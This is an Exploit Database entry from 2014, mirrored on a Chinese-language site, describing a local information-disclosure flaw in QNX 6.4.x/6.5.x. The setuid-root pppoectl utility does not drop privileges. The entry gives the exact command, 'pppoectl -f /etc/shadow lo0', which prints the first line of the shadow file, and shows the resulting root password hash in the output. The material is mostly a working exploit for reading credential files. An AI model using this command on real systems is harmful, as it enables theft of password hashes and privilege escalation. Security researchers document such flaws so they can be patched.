QNX 6.4.x/6.5.x pppoectl – Information Disclosure

• Exploit Database
• 39 阅读

• 作者： cenobyte
  日期： 2014-03-10
• 类别：

  • local
  平台：

  • qnx
• 来源：https://www.exploit-db.com/exploits/32156/

• #
  #QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013
  # <vincitamorpatriae@gmail.com>
  #
  # - vulnerability description:
  # QNX setuid root /sbin/pppoectl allows any user to gain access to privileged
  # information such as the root password hash.
  #
  # The vulnerability exists because of a failure to drop privileges or check the
  # permissions and ownership on the file specified as the configuration file.
  #
  # If a user specifies a file such as /etc/shadow, pppoectl will display the
  # first line of the shadow file in the error output.
  #
  # - vulnerable platforms:
  # QNX 6.5.0SP1
  # QNX 6.5.0
  # QNX 6.4.1
  
  $ id
  uid=100(user) gid=100
  
  $ ls -la /etc/shadow
  -rw-------1 rootroot 69 Oct 10 16:55 /etc/shadow
  $ pppoectl -f /etc/shadow lo0
  pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0"